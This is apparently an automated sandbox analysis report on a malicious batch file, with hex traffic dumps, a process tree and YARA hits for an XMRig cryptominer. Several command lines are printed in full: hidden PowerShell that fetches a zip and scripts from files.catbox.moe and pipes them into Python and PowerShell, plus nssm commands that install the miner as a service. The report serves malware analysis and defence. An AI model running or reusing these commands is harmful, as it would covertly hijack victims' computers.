                                                                                                                                                                                                                                2024-12-06 09:26:10 UTC16384INData Raw: aa 84 37 94 ad bf 14 f0 55 e6 0c 24 29 6a e8 4a 78 1e fb a0 89 ea 52 c4 cf 82 83 38 96 3b 43 8e 9e ca e4 60 fa c7 11 f0 44 33 2a 21 d5 e6 34 1e 8c 9a 1a 26 67 8e 32 57 f3 19 fb 49 cb f8 ec 76 7c a4 0f 64 15 8d a3 b9 9a ac 3c 77 87 76 9e ec 10 37 d6 3c df 5d 8d 7b dc 6c db ca 71 c9 0a 64 34 cc 10 ba 65 eb dc d9 55 04 d8 bd 95 6b ef b7 cb ea a4 de f5 55 0d 15 67 21 86 91 94 53 b5 13 63 4f 0d f8 fd 88 ef 3a db a7 9d 05 a3 1c 3f 8d a7 26 8e 6a d3 31 cc a4 83 50 f6 4d dc 7f af 57 4b 14 53 e0 98 63 c9 7b 50 be 49 55 68 08 23 4f a5 c4 45 d1 72 9a e6 50 6c ce 6a 90 bd 74 d5 ec 2c ad 9d dd d5 b2 76 4f fc 8f 69 52 9a d3 c5 6b bf 23 f0 54 cb dc c2 b7 6a 79 3a a4 88 e5 93 a1 75 20 d2 f6 31 7e 72 45 9c ae 2e b4 ee 8d 4c 4c 07 41 c2 3e 33 7c 2f f6 7f c7 78 21 ad c5 22
                                                                                                                                                                                                                                Data Ascii: 7U$)jJxR8;C`D3*!4&g2WIv|d<wv7<]{lqd4eUkUg!ScO:?&j1PMWKSc{PIUh#OErPljt,vOiRk#Tjy:u 1~rE.LLA>3|/x!"
                                                                                                                                                                                                                                2024-12-06 09:26:10 UTC16384INData Raw: 58 09 f7 27 b8 9c e1 5c 00 17 f5 e7 d4 1b e7 46 9f 70 6b 60 eb 08 75 af 70 6f ff a8 b9 f3 68 cf 1b ce 83 f3 e0 56 50 6f 9e 1b 7d 0a bf 09 8e 50 bf 12 ee d7 70 fb d0 5e 30 9c 0f e7 c3 8d a0 de 1a bb 29 5a e0 08 95 15 6e 25 5c 92 f6 a2 e1 02 b8 00 ee 93 ee cc dd dc e8 8b fa db e0 08 b5 5c b8 5d ff d5 dc 87 b4 27 e6 99 b9 9b c7 dc cd d3 dc 6d d4 93 f3 a2 5b 57 31 8f b9 d3 a1 f6 10 ee 06 b8 3b 69 4f 19 ce 82 b3 e0 ce a6 9e 9e 17 7d 4c 56 09 47 a8 2f 7f 0c b9 9f c0 9d 43 7b c6 70 36 9c 0d b7 9a 7a cd 3c 8e a0 64 e8 b0 24 78 cd ec 73 c2 f5 84 db 46 7b d6 70 0e 9c 03 97 a4 5e 37 2f fa aa d4 5a 44 42 dd 20 5c f3 0f 9a 9b 48 7b ce 70 2e 9c 0b f7 61 37 e6 2e c6 35 c0 11 ea 6c e1 8e 86 fb 8c f6 bc e1 3c 38 0f ee 7e ea cd f3 62 ef eb 81 23 d4 3e c2 ed 01 77 1f ed 05
                                                                                                                                                                                                                                Data Ascii: X'\Fpk`upohVPo}Pp^0)Zn%\\]'m[W1;iO}LVG/C{p6z<d$xsF{p^7/ZDB \H{p.a7.5l<8~b#>w


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                3192.168.2.749831108.181.20.354437096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-06 09:26:59 UTC146OUTGET /gw2gji.py HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                Host: files.catbox.moe
                                                                                                                                                                                                                                2024-12-06 09:27:00 UTC477INHTTP/1.1 503 Service Unavailable
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Fri, 06 Dec 2024 09:26:59 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Security-Policy: default-src 'self'; img-src 'self' https://quickchart.io https://files.catbox.moe; media-src 'self' https://files.catbox.moe; style-src 'self' 'unsafe-inline'; script-src https://www.google.com https://www.gstatic.com 'self' 'unsafe-inline'; frame-src https://www.google.com;
                                                                                                                                                                                                                                2024-12-06 09:27:00 UTC25INData Raw: 66 0d 0a 34 30 34 21 20 6e 6f 74 20 66 6f 75 6e 64 21 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: f404! not found!0


                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:04:25:51
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                Start time:04:25:51
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\2zirzlMVqX.bat" "
                                                                                                                                                                                                                                Imagebase:0x7ff7beb40000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                Start time:04:25:51
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                Start time:04:25:51
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                                                                                Imagebase:0x7ff787040000
                                                                                                                                                                                                                                File size:329'504 bytes
                                                                                                                                                                                                                                MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                Start time:04:25:51
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'"
                                                                                                                                                                                                                                Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                Start time:04:25:51
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                Start time:04:25:53
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                Start time:04:25:53
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                Start time:04:25:54
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('"fun.zip','.'); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;
                                                                                                                                                                                                                                Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                Start time:04:25:54
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                Start time:04:25:55
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                Start time:04:25:58
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell.exe "cd $env:TEMP; Start-Process powershell -verb runas -ArgumentList '-WindowStyle hidden Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/ei5hyq.ps1 -OutFile funny.tmp -UseBasicParsing; Get-Content -Raw funny.tmp | powershell.exe - ;'"
                                                                                                                                                                                                                                Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                Start time:04:25:59
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/ei5hyq.ps1 -OutFile funny.tmp -UseBasicParsing; Get-Content -Raw funny.tmp | powershell.exe - ;
                                                                                                                                                                                                                                Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2400933097.0000025E8162F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2400933097.0000025E819D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2400933097.0000025E8199E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2400933097.0000025E8040A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2400933097.0000025E8163D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2400933097.0000025E81633000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2400933097.0000025E803B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2400933097.0000025E819B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2400933097.0000025E803B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                Start time:04:25:59
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                Start time:04:26:04
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                                                                                                                                                                                                                                Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.2170524020.000001B639A7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.2170524020.000001B639554000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.2170524020.000001B63950A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.2170524020.000001B637FB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.2170524020.000001B6382B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                Start time:06:21:04
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                                                                                Imagebase:0x7ff671720000
                                                                                                                                                                                                                                File size:468'120 bytes
                                                                                                                                                                                                                                MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                Start time:06:21:04
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                Start time:06:21:27
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\ProgramData\.logstxt\nssm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\ProgramData\.logstxt\nssm.exe" install xmrig C:\ProgramData\.logstxt\xmrig.exe
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                File size:331'264 bytes
                                                                                                                                                                                                                                MD5 hash:BECEAE2FDC4F7729A93E94AC2CCD78CC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                Start time:06:21:27
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\ProgramData\.logstxt\nssm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\ProgramData\.logstxt\nssm.exe" set xmrig AppDirectory C:\ProgramData\.logstxt
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                File size:331'264 bytes
                                                                                                                                                                                                                                MD5 hash:BECEAE2FDC4F7729A93E94AC2CCD78CC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                Start time:06:21:27
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\ProgramData\.logstxt\nssm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\ProgramData\.logstxt\nssm.exe" set xmrig AppParameters "xmrig.exe -B -c config.json"
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                File size:331'264 bytes
                                                                                                                                                                                                                                MD5 hash:BECEAE2FDC4F7729A93E94AC2CCD78CC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                Start time:06:21:27
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\ProgramData\.logstxt\nssm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\ProgramData\.logstxt\nssm.exe" start xmrig
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                File size:331'264 bytes
                                                                                                                                                                                                                                MD5 hash:BECEAE2FDC4F7729A93E94AC2CCD78CC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                Start time:06:21:27
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\ProgramData\.logstxt\nssm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\ProgramData\.logstxt\nssm.exe
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                File size:331'264 bytes
                                                                                                                                                                                                                                MD5 hash:BECEAE2FDC4F7729A93E94AC2CCD78CC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                Start time:06:21:28
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                Start time:06:21:29
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\ProgramData\.logstxt\xmrig.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\ProgramData\.logstxt\xmrig.exe" xmrig.exe -B -c config.json
                                                                                                                                                                                                                                Imagebase:0x7ff6560c0000
                                                                                                                                                                                                                                File size:6'360'576 bytes
                                                                                                                                                                                                                                MD5 hash:C0F8959614AE06561216158D78A787E5
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000019.00000000.2141475545.00007FF656963000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000019.00000002.3755773342.00000214C084C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000019.00000003.2141888155.00000214C089C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000019.00000003.2141955925.00000214C089C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000019.00000002.3755773342.00000214C087A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:false

